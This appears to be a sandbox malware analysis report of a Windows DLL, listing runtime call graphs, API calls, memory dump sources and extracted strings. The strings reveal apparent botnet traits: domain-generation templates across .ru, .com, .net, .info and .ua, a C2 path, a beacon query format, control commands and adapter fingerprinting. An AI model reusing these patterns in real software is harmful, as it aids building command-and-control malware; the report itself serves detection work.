GetCurrentProcessId QueryPerformanceCounter 22488->22490 22489->22490 22491 6ced47d8 22489->22491 22490->22491 22491->22476 22493 6cecc2fc __wsopen_helper 22492->22493 22494 6cecc37e 22493->22494 22495 6cecc304 22493->22495 22497 6cecc3e7 22494->22497 22498 6cecc382 22494->22498 22540 6ced0936 GetProcessHeap 22495->22540 22500 6cecc3ec 22497->22500 22501 6cecc44a 22497->22501 22503 6cecc3a3 22498->22503 22533 6cecc30d __wsopen_helper __CRT_INIT@12 22498->22533 22627 6ced0bab 22498->22627 22499 6cecc309 22499->22533 22541 6cece4e4 22499->22541 22502 6ced16cb __CRT_INIT@12 TlsGetValue 22500->22502 22504 6cece374 __freeptd 106 API calls 22501->22504 22501->22533 22506 6cecc3f7 22502->22506 22644 6ced0a82 DecodePointer 22503->22644 22504->22533 22511 6ced11bc __calloc_crt 106 API calls 22506->22511 22506->22533 22509 6cecc319 __RTC_Initialize 22517 6cecc329 GetCommandLineA 22509->22517 22509->22533 22513 6cecc408 22511->22513 22512 6cecc3b9 __CRT_INIT@12 22668 6cecc3d2 22512->22668 22518 6ced16ea __CRT_INIT@12 TlsSetValue 22513->22518 22513->22533 22514 6ced444f __ioterm 107 API calls 22516 6cecc3b4 22514->22516 22519 6cece55a __mtterm 109 API calls 22516->22519 22562 6ced484d GetEnvironmentStringsW 22517->22562 22521 6cecc420 22518->22521 22519->22512 22523 6cecc43e 22521->22523 22524 6cecc426 22521->22524 22527 6cecb6e4 _free 106 API calls 22523->22527 22526 6cece431 __initptd 106 API calls 22524->22526 22530 6cecc42e GetCurrentThreadId 22526->22530 22527->22533 22528 6cecc343 22529 6cecc347 22528->22529 22594 6ced44a1 22528->22594 22630 6cece55a 22529->22630 22530->22533 22533->22485 22535 6cecc367 22535->22533 22639 6ced444f 22535->22639 22540->22499 22672 6ced0c52 EncodePointer 22541->22672 22543 6cece4e9 22677 6ced116e 22543->22677 22546 6cece4f2 22547 6cece55a __mtterm 109 API calls 22546->22547 22549 6cece4f7 22547->22549 22549->22509 22551 6cece50f 22552 6ced11bc __calloc_crt 106 API calls 22551->22552 22553 6cece51c 22552->22553 22554 6cece551 22553->22554 22556 6ced16ea __CRT_INIT@12 TlsSetValue 22553->22556 22555 6cece55a __mtterm 109 API calls 22554->22555 22557 6cece556 22555->22557 22558 6cece530 22556->22558 22557->22509 22558->22554 22559 6cece536 22558->22559 22560 6cece431 __initptd 106 API calls 22559->22560 22561 6cece53e GetCurrentThreadId 22560->22561 22561->22509 22563 6cecc339 22562->22563 22564 6ced4860 WideCharToMultiByte 22562->22564 22575 6ced419b 22563->22575 22566 6ced48ca FreeEnvironmentStringsW 22564->22566 22567 6ced4893 22564->22567 22566->22563 22568 6ced1204 __malloc_crt 106 API calls 22567->22568 22569 6ced4899 22568->22569 22569->22566 22570 6ced48a0 WideCharToMultiByte 22569->22570 22571 6ced48bf FreeEnvironmentStringsW 22570->22571 22572 6ced48b6 22570->22572 22571->22563 22573 6cecb6e4 _free 106 API calls 22572->22573 22574 6ced48bc 22573->22574 22574->22571 22576 6ced41a7 __wsopen_helper 22575->22576 22577 6ced103d __lock 106 API calls 22576->22577 22578 6ced41ae 22577->22578 22579 6ced11bc __calloc_crt 106 API calls 22578->22579 22580 6ced41bf 22579->22580 22581 6ced422a GetStartupInfoW 22580->22581 22582 6ced41ca __wsopen_helper @_EH4_CallFilterFunc@8 22580->22582 22583 6ced423f 22581->22583 22584 6ced436e 22581->22584 22582->22528 22583->22584 22587 6ced428d 22583->22587 22588 6ced11bc __calloc_crt 106 API calls 22583->22588 22585 6ced4436 22584->22585 22589 6ced43bb GetStdHandle 22584->22589 22590 6ced43ce GetFileType 22584->22590 22593 6ced170c __mtinitlocknum InitializeCriticalSectionAndSpinCount 22584->22593 22685 6ced4446 22585->22685 22587->22584 22591 6ced42c1 GetFileType 22587->22591 22592 6ced170c __mtinitlocknum InitializeCriticalSectionAndSpinCount 22587->22592 22588->22583 22589->22584 22590->22584 22591->22587 22592->22587 22593->22584 22595 6ced44af 22594->22595 22596 6ced44b4 GetModuleFileNameA 22594->22596 22695 6cecd9da 22595->22695 22597 6ced44e1 22596->22597 22689 6ced4554 22597->22689 22601 6ced1204 __malloc_crt 106 API calls 22602 6ced451a 22601->22602 22603 6ced4554 _parse_cmdline 106 API calls 22602->22603 22604 6cecc353 22602->22604 22603->22604 22604->22535 22605 6ced46d0 22604->22605 22606 6ced46d9 22605->22606 22609 6ced46de _strlen 22605->22609 22607 6cecd9da ___initmbctable 118 API calls 22606->22607 22607->22609 22608 6ced11bc __calloc_crt 106 API calls 22617 6ced4714 _strlen 22608->22617 22609->22608 22612 6cecc35c 22609->22612 22610 6ced4766 22611 6cecb6e4 _free 106 API calls 22610->22611 22611->22612 22612->22535 22621 6ced0bba 22612->22621 22613 6ced11bc __calloc_crt 106 API calls 22613->22617 22614 6ced478d 22615 6cecb6e4 _free 106 API calls 22614->22615 22615->22612 22617->22610 22617->22612 22617->22613 22617->22614 22618 6ced47a4 22617->22618 22817 6cecf40c 22617->22817 22619 6cecd655 __invoke_watson 8 API calls 22618->22619 22620 6ced47b0 22619->22620 22622 6ced0bc6 __IsNonwritableInCurrentImage 22621->22622 22826 6ced61af 22622->22826 22624 6ced0be4 __initterm_e 22625 6cecbaf7 __cinit 106 API calls 22624->22625 22626 6ced0c03 _doexit __IsNonwritableInCurrentImage 22624->22626 22625->22626 22626->22535 22628 6ced0cf4 _doexit 106 API calls 22627->22628 22629 6ced0bb6 22628->22629 22629->22503 22631 6cece564 22630->22631 22633 6cece56a 22630->22633 22829 6ced16ac 22631->22829 22634 6ced10a3 22633->22634 22635 6ced1087 DeleteCriticalSection 22633->22635 22637 6ced10af DeleteCriticalSection 22634->22637 22638 6ced10c2 22634->22638 22636 6cecb6e4 _free 106 API calls 22635->22636 22636->22633 22637->22634 22638->22533 22643 6ced4456 22639->22643 22640 6ced449e 22640->22529 22641 6cecb6e4 _free 106 API calls 22641->22643 22642 6ced446f DeleteCriticalSection 22642->22643 22643->22640 22643->22641 22643->22642 22645 6ced0a9c 22644->22645 22646 6ced0aae 22644->22646 22645->22646 22648 6cecb6e4 _free 106 API calls 22645->22648 22647 6cecb6e4 _free 106 API calls 22646->22647 22649 6ced0abb 22647->22649 22648->22645 22650 6ced0adf 22649->22650 22652 6cecb6e4 _free 106 API calls 22649->22652 22651 6cecb6e4 _free 106 API calls 22650->22651 22653 6ced0aeb 22651->22653 22652->22649 22654 6cecb6e4 _free 106 API calls 22653->22654 22655 6ced0afc 22654->22655 22656 6cecb6e4 _free 106 API calls 22655->22656 22657 6ced0b07 22656->22657 22658 6ced0b2c EncodePointer 22657->22658 22661 6cecb6e4 _free 106 API calls 22657->22661 22659 6ced0b47 22658->22659 22660 6ced0b41 22658->22660 22663 6ced0b5d 22659->22663 22665 6cecb6e4 _free 106 API calls 22659->22665 22662 6cecb6e4 _free 106 API calls 22660->22662 22664 6ced0b2b 22661->22664 22662->22659 22666 6cecb6e4 _free 106 API calls 22663->22666 22667 6cecc3a8 22663->22667 22664->22658 22665->22663 22666->22667 22667->22512 22667->22514 22669 6cecc3e4 22668->22669 22670 6cecc3d6 22668->22670 22669->22533 22670->22669 22671 6cece55a __mtterm 109 API calls 22670->22671 22671->22669 22673 6ced0c63 __init_pointers __initp_misc_winsig 22672->22673 22684 6cecc15a EncodePointer 22673->22684 22675 6ced0c7b __init_pointers 22676 6ced177a 34 API calls 22675->22676 22676->22543 22678 6ced117a 22677->22678 22679 6ced170c __mtinitlocknum InitializeCriticalSectionAndSpinCount 22678->22679 22680 6cece4ee 22678->22680 22679->22678 22680->22546 22681 6ced168e 22680->22681 22682 6cece504 22681->22682 22683 6ced16a5 TlsAlloc 22681->22683 22682->22546 22682->22551 22684->22675 22688 6ced11a7 LeaveCriticalSection 22685->22688 22687 6ced444d 22687->22582 22688->22687 22691 6ced4576 22689->22691 22693 6ced45da 22691->22693 22699 6ceda386 22691->22699 22692 6ced44f7 22692->22601 22692->22604 22693->22692 22694 6ceda386 _parse_cmdline 106 API calls 22693->22694 22694->22693 22696 6cecd9ea 22695->22696 22697 6cecd9e3 22695->22697 22696->22596 22705 6cecdd37 22697->22705 22702 6ceda32c 22699->22702 22703 6ceca9eb _LocaleUpdate::_LocaleUpdate 106 API calls 22702->22703 22704 6ceda33e 22703->22704 22704->22691 22706 6cecdd43 __wsopen_helper 22705->22706 22707 6cece3aa _LocaleUpdate::_LocaleUpdate 106 API calls 22706->22707 22708 6cecdd4b 22707->22708 22709 6cecdc91 _LocaleUpdate::_LocaleUpdate 106 API calls 22708->22709 22710 6cecdd55 22709->22710 22730 6cecda32 22710->22730 22713 6ced1204 __malloc_crt 106 API calls 22714 6cecdd77 22713->22714 22715 6cecdea4 __wsopen_helper 22714->22715 22737 6cecdedf 22714->22737 22715->22696 22718 6cecddad 22722 6cecb6e4 _free 106 API calls 22718->22722 22724 6cecddcd 22718->22724 22719 6cecdeb4 22719->22715 22720 6cecb6e4 _free 106 API calls 22719->22720 22723 6cecdec7 22719->22723 22720->22723 22721 6cece5ab __wsopen_helper 106 API calls 22721->22715 22722->22724 22723->22721 22724->22715 22725 6ced103d __lock 106 API calls 22724->22725 22726 6cecddfc 22725->22726 22727 6cecde8a 22726->22727 22729 6cecb6e4 _free 106 API calls 22726->22729 22747 6cecdea9 22727->22747 22729->22727 22731 6ceca9eb _LocaleUpdate::_LocaleUpdate 106 API calls 22730->22731 22732 6cecda42 22731->22732 22733 6cecda51 GetOEMCP 22732->22733 22734 6cecda63 22732->22734 22735 6cecda7a 22733->22735 22734->22735 22736 6cecda68 GetACP 22734->22736 22735->22713 22735->22715 22736->22735 22738 6cecda32 getSystemCP 108 API calls 22737->22738 22739 6cecdefc 22738->22739 22742 6cecdf4d IsValidCodePage 22739->22742 22744 6cecdf03 setSBCS 22739->22744 22746 6cecdf72 __wctomb_s_l __setmbcp_nolock 22739->22746 22740 6ceccc9b _$I10_OUTPUT 6 API calls 22741 6cecdd9e 22740->22741 22741->22718 22741->22719 22743 6cecdf5f GetCPInfo 22742->22743 22742->22744 22743->22744 22743->22746 22744->22740 22750 6cecdaff GetCPInfo 22746->22750 22816 6ced11a7 LeaveCriticalSection 22747->22816 22749 6cecdeb0 22749->22715 22751 6cecdbe1 22750->22751 22757 6cecdb37 22750->22757 22754 6ceccc9b _$I10_OUTPUT 6 API calls 22751->22754 22756 6cecdc8d 22754->22756 22756->22744 22760 6ced6aed 22757->22760 22759 6ced6991 ___crtLCMapStringA 110 API calls 22759->22751 22761 6ceca9eb _LocaleUpdate::_LocaleUpdate 106 API calls 22760->22761 22762 6ced6afe 22761->22762 22770 6ced69f5 22762->22770 22765 6ced6991 22766 6ceca9eb _LocaleUpdate::_LocaleUpdate 106 API calls 22765->22766 22767 6ced69a2 22766->22767 22787 6ced678d 22767->22787 22771 6ced6a1c MultiByteToWideChar 22770->22771 22772 6ced6a0f 22770->22772 22773 6ced6a48 22771->22773 22782 6ced6a41 22771->22782 22772->22771 22777 6cecb71c _malloc 106 API calls 22773->22777 22781 6ced6a6a __crtLCMapStringA_stat __wctomb_s_l 22773->22781 22774 6ceccc9b _$I10_OUTPUT 6 API calls 22775 6cecdb98 22774->22775 22775->22765 22776 6ced6aa6 MultiByteToWideChar 22778 6ced6ad0 22776->22778 22779 6ced6ac0 GetStringTypeW 22776->22779 22777->22781 22783 6ced69d7 22778->22783 22779->22778 22781->22776 22781->22782 22782->22774 22784 6ced69e1 22783->22784 22785 6ced69f2 22783->22785 22784->22785 22786 6cecb6e4 _free 106 API calls 22784->22786 22785->22782 22786->22785 22790 6ced67a6 MultiByteToWideChar 22787->22790 22789 6ced6805 22791 6ceccc9b _$I10_OUTPUT 6 API calls 22789->22791 22790->22789 22796 6ced680c 22790->22796 22794 6cecdbb9 22791->22794 22792 6ced686b MultiByteToWideChar 22795 6ced6884 22792->22795 22804 6ced68d2 22792->22804 22793 6ced6834 __crtLCMapStringA_stat 22793->22789 22793->22792 22794->22759 22812 6ced85b8 22795->22812 22796->22793 22799 6cecb71c _malloc 106 API calls 22796->22799 22798 6ced69d7 __freea 106 API calls 22798->22789 22799->22793 22800 6ced6898 22801 6ced68ae 22800->22801 22802 6ced68da 22800->22802 22800->22804 22803 6ced85b8 __crtLCMapStringA_stat LCMapStringW 22801->22803 22801->22804 22807 6cecb71c _malloc 106 API calls 22802->22807 22810 6ced6902 __crtLCMapStringA_stat 22802->22810 22803->22804 22804->22798 22805 6ced85b8 __crtLCMapStringA_stat LCMapStringW 22806 6ced6945 22805->22806 22808 6ced696d 22806->22808 22811 6ced695f WideCharToMultiByte 22806->22811 22807->22810 22809 6ced69d7 __freea 106 API calls 22808->22809 22809->22804 22810->22804 22810->22805 22811->22808 22813 6ced85c8 22812->22813 22814 6ced85e3 __crtLCMapStringA_stat 22812->22814 22813->22800 22815 6ced85fa LCMapStringW 22814->22815 22815->22800 22816->22749 22818 6cecf417 22817->22818 22820 6cecf425 22817->22820 22818->22820 22824 6cecf43b 22818->22824 22819 6cece5ab __wsopen_helper 106 API calls 22821 6cecf42c 22819->22821 22820->22819 22822 6cecd645 __wsopen_helper 9 API calls 22821->22822 22823 6cecf436 22822->22823 22823->22617 22824->22823 22825 6cece5ab __wsopen_helper 106 API calls 22824->22825 22825->22821 22827 6ced61b2 EncodePointer 22826->22827 22827->22827 22828 6ced61cc 22827->22828 22828->22624 22830 6ced16bf 22829->22830 22831 6ced16c3 TlsFree 22829->22831 22830->22633 22831->22633
                              APIs
                              • InitializeCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB6929
                              • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 6CEB6939
                              • GetProcAddress.KERNEL32(00000000), ref: 6CEB6940
                              • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 6CEB6956
                              • GetProcAddress.KERNEL32(00000000), ref: 6CEB695D
                              • GetTickCount.KERNEL32 ref: 6CEB6974
                              • GetVersionExA.KERNEL32(6CEF1010), ref: 6CEB698E
                              • _malloc.LIBCMT ref: 6CEB69B8
                                • Part of subcall function 6CECB71C: __FF_MSGBANNER.LIBCMT ref: 6CECB733
                                • Part of subcall function 6CECB71C: __NMSG_WRITE.LIBCMT ref: 6CECB73A
                                • Part of subcall function 6CECB71C: RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,00000000,00000000,?,6CED121A,?,?,?,00000000,?,6CED1107,00000018,6CEEAEA8), ref: 6CECB75F
                              • _malloc.LIBCMT ref: 6CEB69CF
                              • _malloc.LIBCMT ref: 6CEB69DD
                              • _malloc.LIBCMT ref: 6CEB69EE
                              • _malloc.LIBCMT ref: 6CEB69FF
                              • _malloc.LIBCMT ref: 6CEB6A0D
                              • _malloc.LIBCMT ref: 6CEB6A1E
                              • _malloc.LIBCMT ref: 6CEB6A2C
                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 6CEB6A3C
                              • HeapAlloc.KERNEL32(00000000), ref: 6CEB6A43
                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 6CEB6A53
                              • HeapAlloc.KERNEL32(00000000), ref: 6CEB6A5A
                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 6CEB6A6D
                              • HeapAlloc.KERNEL32(00000000), ref: 6CEB6A74
                              • EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB6AC1
                              • LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB6AD2
                              • _malloc.LIBCMT ref: 6CEB6B55
                              • _malloc.LIBCMT ref: 6CEB6B66
                              • _malloc.LIBCMT ref: 6CEB6B77
                              • _malloc.LIBCMT ref: 6CEB6B98
                              • QueryPerformanceCounter.KERNEL32(6CEF13F0), ref: 6CEB6BA9
                              • Sleep.KERNELBASE(6F94537B), ref: 6CEB6BBA
                              • _malloc.LIBCMT ref: 6CEB6BE1
                              • _malloc.LIBCMT ref: 6CEB6BEF
                              • Sleep.KERNELBASE(00001388), ref: 6CEB6C32
                              • Sleep.KERNELBASE(0000EA60), ref: 6CEB6C47
                              • EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB6C52
                              • LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB6C68
                              • GetTickCount.KERNEL32 ref: 6CEB6E19
                              • wsprintfA.USER32 ref: 6CEB6F3C
                              • wsprintfA.USER32 ref: 6CEB6FA9
                              • wsprintfA.USER32 ref: 6CEB7016
                              • wsprintfA.USER32 ref: 6CEB70ED
                              • wsprintfA.USER32 ref: 6CEB71A1
                              • wsprintfA.USER32 ref: 6CEB720E
                              • wsprintfA.USER32 ref: 6CEB73BF
                              • wsprintfA.USER32 ref: 6CEB7466
                              • wsprintfA.USER32 ref: 6CEB74D3
                              • wsprintfA.USER32 ref: 6CEB7617
                              • wsprintfA.USER32 ref: 6CEB76BE
                              • wsprintfA.USER32 ref: 6CEB772B
                              • wsprintfA.USER32 ref: 6CEB7798
                              • wsprintfA.USER32 ref: 6CEB7805
                              • wsprintfA.USER32 ref: 6CEB786F
                              • wsprintfA.USER32 ref: 6CEB7916
                              • wsprintfA.USER32 ref: 6CEB7983
                              • wsprintfA.USER32 ref: 6CEB79F0
                              • wsprintfA.USER32 ref: 6CEB7A5D
                              • wsprintfA.USER32 ref: 6CEB7AC7
                              • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 6CEB7CC9
                              • InternetSetOptionA.WININET(00000000,00000002,00001388,00000004), ref: 6CEB7CF4
                              • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 6CEB7D12
                              • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 6CEB7D30
                              • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200,00000000), ref: 6CEB7D68
                              • InternetReadFile.WININET(00000000,00000000,00001000,?), ref: 6CEB7D96
                              • InternetCloseHandle.WININET(00000000), ref: 6CEB7DC3
                              • InternetCloseHandle.WININET(00000000), ref: 6CEB7DCC
                              • EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB7E5A
                              • LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB7E70
                              • _malloc.LIBCMT ref: 6CEB7F06
                              • EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB7F14
                              • LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB7F28
                              • _malloc.LIBCMT ref: 6CEB801D
                              • _strtok.LIBCMT ref: 6CEB806B
                              • _swscanf.LIBCMT ref: 6CEB809A
                              • _strtok.LIBCMT ref: 6CEB80BB
                              • _free.LIBCMT ref: 6CEB80D0
                              • Sleep.KERNELBASE(000007D0,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEB8281
                              • EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB82E3
                              • LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB82F4
                                • Part of subcall function 6CEB4E8E: _memmove.LIBCMT ref: 6CEB4F86
                              • _sprintf.LIBCMT ref: 6CEB8395
                                • Part of subcall function 6CEB468E: htons.WS2_32(?), ref: 6CEB46B2
                                • Part of subcall function 6CEB468E: htonl.WS2_32(00000000), ref: 6CEB46C9
                                • Part of subcall function 6CEB468E: htonl.WS2_32(00000000), ref: 6CEB46D0
                              • _malloc.LIBCMT ref: 6CEB86D4
                              • _free.LIBCMT ref: 6CEB8721
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: wsprintf$_malloc$CriticalSection$Internet$Heap$EnterLeave$HandleSleep$AllocOptionProcess$AddressCloseCountModuleOpenProcTick_free_strtokhtonl$AllocateCounterFileInitializePerformanceQueryReadVersion_memmove_sprintf_swscanfhtons
                              • String ID: $%d;$/fox.php?c=$<htm$Host: %s$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$a%c%c%c%c%c%c.ru$abcdefghijklmnopqrstuvwxyzeioubd$auth_ip$auth_swith$b%c%c%c%c%c%c.com$block$c%c%c%c%c%c%c.net$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$connect$d%c%c%c%c%c%c.info$disconnect$e%c%c%c%c%c%c.ua$f%c%c%c%c%c%c.ru$g%c%c%c%c%c%c.com$h%c%c%c%c%c%c.net$http://$i%c%c%c%c%c%c.info$i4hiea56#7b&dfw3$idle$j%c%c%c%c%c%c.info$k%c%c%c%c%c%c%d.ua$l%c%c%c%c%c%c.ru$m%c%c%c%c%c%c.com$n%c%c%c%c%c%c.net$ntdll.dll$o%c%c%c%c%c%c.info$p%c%c%c%c%c%c.ua$q%c%c%c%c%c%c.ru$r%c%c%c%c%c%c.com$s$s%c%c%c%c%c%c.net$sprintf$strcat$t%c%c%c%c%c%c.info$u%c%c%c%c%c%c.ua$updips$updurls$urls$v%c%c%c%c%c%c.ru$w%c%c%c%c%c%c.com$x%c%c%c%c%c%c.net$y%c%c%c%c%c%c.info$z%c%c%c%c%c%c.ua$dl
                              • API String ID: 1836220982-2750600800
                              • Opcode ID: 0b3594e623d70fc39851ff022c0ccb5e656e04869fd1d59299c1e9f40f30c2ef
                              • Instruction ID: b736b07fe67f9cd1580e9e75e2773f08089cc8ac9c72a462bbf31c7448ad69c3
                              • Opcode Fuzzy Hash: 0b3594e623d70fc39851ff022c0ccb5e656e04869fd1d59299c1e9f40f30c2ef
                              • Instruction Fuzzy Hash: 0C13A17290416C9FDF51DBACCD41BEEBBB8AB09304F240495F569FBA52CA349A81CF10

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 577 6cec8107-6cec812a LoadLibraryA 578 6cec81ea-6cec81f1 577->578 579 6cec8130-6cec813e GetProcAddress 577->579 580 6cec8144-6cec8154 579->580 581 6cec81e3-6cec81e4 FreeLibrary 579->581 582 6cec8156-6cec8162 GetAdaptersInfo 580->582 581->578 583 6cec819a-6cec81a2 582->583 584 6cec8164 582->584 585 6cec81ab-6cec81b0 583->585 586 6cec81a4-6cec81aa call 6cecbefb 583->586 587 6cec8166-6cec816d 584->587 589 6cec81de-6cec81e2 585->589 590 6cec81b2-6cec81b5 585->590 586->585 591 6cec816f-6cec8173 587->591 592 6cec8177-6cec817f 587->592 589->581 590->589 594 6cec81b7-6cec81bc 590->594 591->587 595 6cec8175 591->595 596 6cec8182-6cec8187 592->596 598 6cec81be-6cec81c6 594->598 599 6cec81c9-6cec81d4 call 6cecc29f 594->599 595->583 596->596 597 6cec8189-6cec8196 call 6cec7ddb 596->597 597->583 598->599 599->589 604 6cec81d6-6cec81d9 599->604 604->582
                              APIs
                              • LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 6CEC811D
                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 6CEC8136
                              • GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 6CEC815B
                              • FreeLibrary.KERNEL32(00000000), ref: 6CEC81E4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
